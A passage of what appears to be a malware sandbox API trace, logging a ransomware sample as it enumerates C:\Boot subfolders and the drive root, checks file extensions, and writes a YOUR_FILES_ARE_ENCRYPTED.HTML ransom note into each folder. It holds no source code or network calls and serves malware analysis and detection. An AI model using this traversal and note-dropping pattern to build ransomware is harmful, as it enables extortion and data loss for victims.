ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.721] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.721] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0104.721] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.721] lstrlenW (lpString=".mui") returned 4 [0104.721] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.721] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa560, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.721] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.721] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\memtest.exe.mui") returned 33 [0104.721] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.722] lstrlenW (lpString=".mui") returned 4 [0104.722] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.722] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa560, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.722] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0104.722] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.722] GetProcessHeap () returned 0x600000 [0104.722] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.722] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\zh-cn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.723] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.724] CloseHandle (hObject=0x300) returned 1 [0104.724] GetProcessHeap () returned 0x600000 [0104.724] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.724] GetProcessHeap () returned 0x600000 [0104.724] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.725] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0104.725] StrStrIW (lpFirst="zh-HK", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.725] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0104.725] GetProcessHeap () returned 0x600000 [0104.725] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.726] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\zh-HK" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK") returned="\\\\?\\C:\\Boot\\zh-HK" [0104.726] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-HK", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK\\*") returned="\\\\?\\C:\\Boot\\zh-HK\\*" [0104.726] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.727] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.727] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf958, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.727] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.727] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0104.727] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.727] lstrlenW (lpString=".mui") returned 4 [0104.727] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.727] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.727] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.728] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\memtest.exe.mui") returned 33 [0104.728] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.728] lstrlenW (lpString=".mui") returned 4 [0104.728] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.728] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.728] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.728] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.728] GetProcessHeap () returned 0x600000 [0104.728] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.728] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\zh-hk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.729] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.730] CloseHandle (hObject=0x300) returned 1 [0104.730] GetProcessHeap () returned 0x600000 [0104.730] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.730] GetProcessHeap () returned 0x600000 [0104.730] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.731] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0104.731] StrStrIW (lpFirst="zh-TW", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.731] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0104.731] GetProcessHeap () returned 0x600000 [0104.731] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.732] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\zh-TW" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW") returned="\\\\?\\C:\\Boot\\zh-TW" [0104.732] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-TW", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW\\*") returned="\\\\?\\C:\\Boot\\zh-TW\\*" [0104.732] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0104.733] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.733] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.733] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.733] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0104.733] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.733] lstrlenW (lpString=".mui") returned 4 [0104.733] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.733] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa560, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.733] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.733] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\memtest.exe.mui") returned 33 [0104.733] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.733] lstrlenW (lpString=".mui") returned 4 [0104.733] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.733] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa560, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.733] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0104.733] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.733] GetProcessHeap () returned 0x600000 [0104.733] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.733] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\zh-tw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.734] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.735] CloseHandle (hObject=0x300) returned 1 [0104.736] GetProcessHeap () returned 0x600000 [0104.736] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.736] GetProcessHeap () returned 0x600000 [0104.736] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.736] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0104.736] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0104.737] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 41 [0104.737] GetProcessHeap () returned 0x600000 [0104.737] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x670340 [0104.737] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0104.737] WriteFile (in: hFile=0x2fc, lpBuffer=0x670340*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f708, lpOverlapped=0x0 | out: lpBuffer=0x670340*, lpNumberOfBytesWritten=0x19f708*=0x3c00, lpOverlapped=0x0) returned 1 [0104.738] CloseHandle (hObject=0x2fc) returned 1 [0104.739] GetProcessHeap () returned 0x600000 [0104.739] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0104.739] GetProcessHeap () returned 0x600000 [0104.739] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0104.739] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x61b64, dwReserved0=0x0, dwReserved1=0x19f7ac, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0104.739] StrStrIW (lpFirst="bootmgr", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.739] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0104.739] PathFindExtensionW (pszPath="bootmgr") returned="" [0104.739] lstrlenW (lpString="") returned 0 [0104.740] PathFindExtensionW (pszPath="bootmgr") returned="" [0104.740] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x19f7ac, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0104.740] StrStrIW (lpFirst="BOOTNXT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.740] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\BOOTNXT") returned 14 [0104.740] PathFindExtensionW (pszPath="BOOTNXT") returned="" [0104.740] lstrlenW (lpString="") returned 0 [0104.740] PathFindExtensionW (pszPath="BOOTNXT") returned="" [0104.740] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x78d17e5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78d17e5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78d17e5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x19f7ac, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0104.740] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.740] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0104.740] PathFindExtensionW (pszPath="BOOTSECT.BAK") returned=".BAK" [0104.740] lstrlenW (lpString=".BAK") returned 4 [0104.740] PathFindExtensionW (pszPath="BOOTSECT.BAK") returned=".BAK" [0104.740] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0104.740] StrStrIW (lpFirst="Documents and Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.740] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0104.740] GetProcessHeap () returned 0x600000 [0104.740] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0104.741] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\Documents and Settings" | out: lpString1="\\\\?\\C:\\Documents and Settings") returned="\\\\?\\C:\\Documents and Settings" [0104.741] lstrcatW (in: lpString1="\\\\?\\C:\\Documents and Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Documents and Settings\\*") returned="\\\\?\\C:\\Documents and Settings\\*" [0104.741] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="zh-TW", cAlternateFileName="翿")) returned 0xffffffff [0104.742] GetProcessHeap () returned 0x600000 [0104.742] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0104.742] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x551dbbfd, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x551dbbfd, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0xaa715a5, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0104.742] StrStrIW (lpFirst="hiberfil.sys", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.742] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0104.742] PathFindExtensionW (pszPath="hiberfil.sys") returned=".sys" [0104.742] lstrlenW (lpString=".sys") returned 4 [0104.742] PathFindExtensionW (pszPath="hiberfil.sys") returned=".sys" [0104.742] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x85890a37, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x85890a37, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xb7ec065, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x48000000, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0104.742] StrStrIW (lpFirst="pagefile.sys", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.742] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0104.742] PathFindExtensionW (pszPath="pagefile.sys") returned=".sys" [0104.742] lstrlenW (lpString=".sys") returned 4 [0104.742] PathFindExtensionW (pszPath="pagefile.sys") returned=".sys" [0104.742] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0104.742] StrStrIW (lpFirst="PerfLogs", 